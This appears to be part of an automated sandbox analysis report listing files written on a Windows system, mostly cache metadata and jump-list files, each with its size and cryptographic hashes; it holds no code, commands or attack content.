SHA512899956b62cdc5d96ededf81e6356356a9d51f13c2dc3043389fd6bd61cc2b4d4e6bec181c4e4ff9c948893cf7361ccbe933f4a9e511115d8470ff7bd286e7892
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5c2d4d3d387c8398035809164caf442b7
SHA184f133cccf2553e6938f496722a86a9d205943ab
SHA2561f19c67daa83c0b17ce6f14833220b1387a9357354c096a48be3850653d31d89
SHA51202b7398e9018340dd0e1a041a0569e84ecad515d281b1a9a856f41d844044a5128bc1c853ad9f9820a5556bd164c3aabbf51a61208fdc8fa3bcebfdd8f4b2164
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD54b475ef362a48cdae692e6b42e1fc4c2
SHA17b037915f06ad97c109a9f3b8ffb47589aab3323
SHA256854bc89a91037abcfa5b44bd14e5dc28fa9603143459ea6540a88d815913eb13
SHA512e307992a11726da392ef795a31492a70a36dfd62d35cb792ecd3c7da16c0f1a8224c3652017cee98d37d3cf123e004f5d1cba0054d5027643d603a70fd1d745e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50b7af0dc62a58a4734ec05c6112d3340
SHA1df3e1b506b951b13d42225b22f15a3dd3c67f738
SHA2569ce95436930284d899d0b2b0bfae08523c71b53e7aefe1292c7d9a9d4a03737a
SHA512a4e3e72c0c2ba4c29299c17809b7698b4359c892fc04eaf87aa633d0e639bfa792cba4d0cb99e234f80eb9860996df68808abb3a67d00fee436d1b408d3e70eb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD526d50cb532a85e75684d973331c06cc8
SHA1dc21d4a0f294ae40348f401e04972377d4571da4
SHA256b87d20a4541b60556d03f0e4cfca717e8fb478848021d8434716e145e4d2930d
SHA512dc644fef27527d5c30dcdf5b0c210d0098c343311b343c8ce4cdad1939068897d7398898a4f8a7d49ab67a45a1730a3c9d5d8aa9e6505f9aad4e7aab4afcf2dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD567311ba2bc7ddf310310100f62785048
SHA17ad4365f6ade43acf26f76f3336fa286d7b7c97c
SHA25697fdc02311e2155fed8574a2032fe65ef2d0dd2dbf7137b006e02be438c034cf
SHA5123fc9db9a762bac6d5960dd510c1f8edb40450bf165162d38b480fb1ae1666b93a6363049b93e8316e9b393c9daadc1f8cc6f7abcc7ac0722f3ed2947271ed4bf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58490e263eba512006a7cfe1075afebdd
SHA10baa9b30b8cc672ca22059c260f95248a3d9201b
SHA256ff867e2f64a74bd3d507d9303bf4a439ccfdfcd8d9c8c64707f23266caecc2d5
SHA5120b3c9f588793a13c42c858abc7bd5ca9ac65a3d0b060736ac66f14b8b9d32c38f0d8d27a4cf5003334ad3bb450756f32df4032a04429583f3eeccd7353ae64a3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5ab81b9dc36825e4d255380b3adbd0d78
SHA19cf81a34da9c560b944a1345084ee7dd38d12eaf
SHA256542b6a61c7bc944bfa94de35e9e097c31bbd95414d27d1ad057c34052dbbf145
SHA512a4bb004dbe758784c94dc1c3e67a1f165614782dfb4e86a42c8a4040c476f9ba32746173347d4d0ca9da912d955d2dd62e7fa593ac0b7b8fff90b45f3bd831c0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD58c97f2a463c01434e1a4911bc5397a95
SHA1b06b34294f5dae41b3ea80c632cb58e7d4acb42f
SHA25660b0b4df83ce548fec896208e6b8cf042ded6b63b2939fd4d9dc75511b9c7173
SHA51241ae97854063ee0417bec5b1bbff96bf3e55198a21fdace422156dc4d13aca79e14a731c93905cf632f70f2a2a160885d0319c02091e8bdfcc07b63d5b48a6bc
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cd6a785b6c9c19c7ca10d02f8d333583
SHA1373c9a53d18f56efa1ecc02060431bac5a7f261a
SHA2566e83316d9bd22d37c0740bb033cc7e87fe524eee79fa318a6cce0bab52c8b0b7
SHA5128fef336c8d236acdc06c43810ca997639a1609b61e8b35b81b0755b2a8268f0b917f2ce5d14d22ffa0715093903f29bbf3ed30c7ecb1e9733015a9afb0f6c47b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cd6a785b6c9c19c7ca10d02f8d333583
SHA1373c9a53d18f56efa1ecc02060431bac5a7f261a
SHA2566e83316d9bd22d37c0740bb033cc7e87fe524eee79fa318a6cce0bab52c8b0b7
SHA5128fef336c8d236acdc06c43810ca997639a1609b61e8b35b81b0755b2a8268f0b917f2ce5d14d22ffa0715093903f29bbf3ed30c7ecb1e9733015a9afb0f6c47b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cd6a785b6c9c19c7ca10d02f8d333583
SHA1373c9a53d18f56efa1ecc02060431bac5a7f261a
SHA2566e83316d9bd22d37c0740bb033cc7e87fe524eee79fa318a6cce0bab52c8b0b7
SHA5128fef336c8d236acdc06c43810ca997639a1609b61e8b35b81b0755b2a8268f0b917f2ce5d14d22ffa0715093903f29bbf3ed30c7ecb1e9733015a9afb0f6c47b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cd6a785b6c9c19c7ca10d02f8d333583
SHA1373c9a53d18f56efa1ecc02060431bac5a7f261a
SHA2566e83316d9bd22d37c0740bb033cc7e87fe524eee79fa318a6cce0bab52c8b0b7
SHA5128fef336c8d236acdc06c43810ca997639a1609b61e8b35b81b0755b2a8268f0b917f2ce5d14d22ffa0715093903f29bbf3ed30c7ecb1e9733015a9afb0f6c47b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K6PS3BVB1ZC5FJNI93QM.temp
Filesize7KB
MD5cd6a785b6c9c19c7ca10d02f8d333583
SHA1373c9a53d18f56efa1ecc02060431bac5a7f261a
SHA2566e83316d9bd22d37c0740bb033cc7e87fe524eee79fa318a6cce0bab52c8b0b7
SHA5128fef336c8d236acdc06c43810ca997639a1609b61e8b35b81b0755b2a8268f0b917f2ce5d14d22ffa0715093903f29bbf3ed30c7ecb1e9733015a9afb0f6c47b
-
Filesize
11KB
MD5cebf7458dceffcbb81a290cf045beb27
SHA198c74fa610995d61d2ee78a2ea888e003e9f436d
SHA25697d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660
SHA512144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f